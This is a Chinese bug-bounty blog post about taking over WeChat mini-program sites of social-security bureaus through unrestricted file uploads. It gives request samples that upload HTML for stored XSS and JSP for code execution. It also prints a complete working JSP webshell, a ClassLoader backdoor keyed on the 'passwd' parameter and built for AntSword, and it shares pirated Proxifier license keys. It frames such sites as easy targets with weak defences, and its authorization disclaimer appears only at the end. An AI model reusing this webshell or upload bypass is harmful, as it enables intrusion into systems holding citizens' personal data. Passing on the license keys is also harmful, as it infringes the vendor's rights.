漏洞挖掘 | 浅谈一次edusrc文件上传成功getshell

0x1 前言

这里记录一下我在微信小程序挖人社局等一些人力资源和社会保障部信息中心漏洞,人社这类漏洞相对于web应用端的漏洞来讲要好挖很多,里面的WAF过滤等一些验证也少。比如你在开始学习src漏洞挖掘,就可以从微信小程序下手。
一般像这类漏洞可以在微信小程序检索就业、人社、贷款等关键字

图片

这类漏洞的话可以在edusrc提交,对于初学者来讲还是蛮友好的,提交多个人社的漏洞,达到一定的rank值,也是可以换取一些礼物的:

图片

0x2 微信小程序抓包工具——Proxifter

新版安装:
Proxifier 官网地址:https://www.proxifier.com/
此软件是收费的,提供免费31天的试用,Win版本的分为安装版和便携版,安装版就是直接双击运行,然后下一步下一步就可以了;便携版需要使用解压软件解压到文件夹,解压后直接运行文件夹里的可执行文件即可。本着白嫖的想法,本文提供三个注册码,两个Win的注册码经验证目前均可以正常使用,MAC的注册码由于太穷买不起MAC电脑,故没有进行测试,能不能正常使用,是个未知数。注册的时候注册名称随意填写。
这是我从别的大佬那白嫖来的,分享给大家。

 
  1. L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C(Portable Edition)#免安装版本

  2. 5EZ8G-C3WL5-B56YG-SCXM9-6QZAP(Standard Edition)#安装版本

  3. P427L-9Y552-5433E-8DSR3-58Z68(MAC) #MAC版本

  4. https://www.proxifier.com/download/ProxifierSetup.exe #安装最新版文件下载链接

  5. https://www.proxifier.com/download/ProxifierPE.zip #便携最新版文件下载链接

配置Proxifter

Proxifter工具的配置,主要是配置下面两个代理设置的地方

图片

图片

具体Proxifter配置参考链接:
https://blog.csdn.net/CKT_GOD/article/details/134076065


0x3 渗透测试——漏洞挖掘

一、存储型XSS漏洞

说到XSS漏洞的话,反射型这里就不多说了哈,反射型XSS在edu都不收,说下存储型XSS漏洞。像我平常在什么地方碰到存储型XSS特别多呢,那就是在微信小程序,里面特别容易上手的一个就是在一些个人页面里面的上传头像、身份证信息等一些存在上传点的地方,因为小程序相对来讲过滤不是很严,可以通过一些WAF的绕过进行上传,来弹一个存储型XSS漏洞。

1、先通过这个头像上传点,上传一张照片上去

图片

2、尝试看看能否上传.html后缀的文件,因为可以上传html后缀的都是可以打一个存储型XSS的
这里改下该数据包的filename、Content-Type,发现可以成功上传html文件,那么接下来就是浏览器访问弹个xss了。

 
  1. ------WebKitFormBoundary4KIO2hZ55xAhk62B

  2. Content-Disposition: form-data; name="file"; filename="kali_linux.html"

  3. Content-Type: text.html

  4. test

  5. ------WebKitFormBoundary4KIO2hZ55xAhk62B--

图片

3、可以看到浏览器反弹XSS成功了

 
  1. ------WebKitFormBoundaryybBAbhwqIL86Jdcn

  2. Content-Disposition: form-data; name="file"; filename="test.html"

  3. Content-Type: text/html

  4. <script>alert(1)</script>

  5. ------WebKitFormBoundaryybBAbhwqIL86Jdcn--

图片

二、文件上传——getshell

经过上面的测试发现,这个网站对文件上传过滤不严,那么我们就可以尝试下文件上传,看看可以上传一句话木马,然后getshell嘛。
经审计,发现该小程序网站是Java框架搞的,那么我们就可以尝试上传jsp后缀的webshell编写的木马来尝试下getshell了。

1、尝试上传jsp代码,发现该代码直接被执行了。真的是逆天了,师傅们!一点过滤都没有,直接解析了,那么就说明他这个网站可以执行jsp代码,那我这不就可以上传jsp木马了嘛。

 
  1. ------WebKitFormBoundaryybBAbhwqIL86Jdcn

  2. Content-Disposition: form-data; name="file"; filename="xiaoma.jsp"

  3. Content-Type: text/html

  4. <h1>test</h1>

  5. ------WebKitFormBoundaryybBAbhwqIL86Jdcn--

图片

2、上传jsp木马,使用蚁剑连接,getshell

jsp木马如下,蚁剑连接密码:passwd

 
  1. <%!

  2. class U extends ClassLoader {

  3. U(ClassLoader c) {

  4. super(c);

  5. }

  6. public Class g(byte[] b) {

  7. return super.defineClass(b, 0, b.length);

  8. }

  9. }

  10. public byte[] base64Decode(String str) throws Exception {

  11. try {

  12. Class clazz = Class.forName("sun.misc.BASE64Decoder");

  13. return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);

  14. } catch (Exception e) {

  15. Class clazz = Class.forName("java.util.Base64");

  16. Object decoder = clazz.getMethod("getDecoder").invoke(null);

  17. return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);

  18. }

  19. }

  20. %>

  21. <%

  22. String cls = request.getParameter("passwd");

  23. if (cls != null) {

  24. new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);

  25. }

  26. %>

图片

成功上传jsp木马,然后使用蚁剑成功连接,然后getshell了。

0x4 总结

这篇文章偏基础的src漏洞挖掘,并且讲的内容还是偏向edusrc方面的。但是这里希望对初学者,特别是刚开始学挖漏洞的师傅们有帮助。这类主要是跟师傅们说一个思路和挖掘的一个方向,推荐师傅们可以先从小程序入手,因为确实相对于web端的漏洞挖掘来说要简单,一些维护以及WAF防护方面做的没有那么好。
总的来讲还是希望对师傅们有帮助,后面还有别的一些漏洞挖掘的思路,后续也会写文章给大家更新~

更多网络安全优质免费学习资料与干货教程+

送渗透工具、技术文档、书籍,面试题、视频(基础到进阶。环境搭建,HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等)、应急响应笔记、学习路线。

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值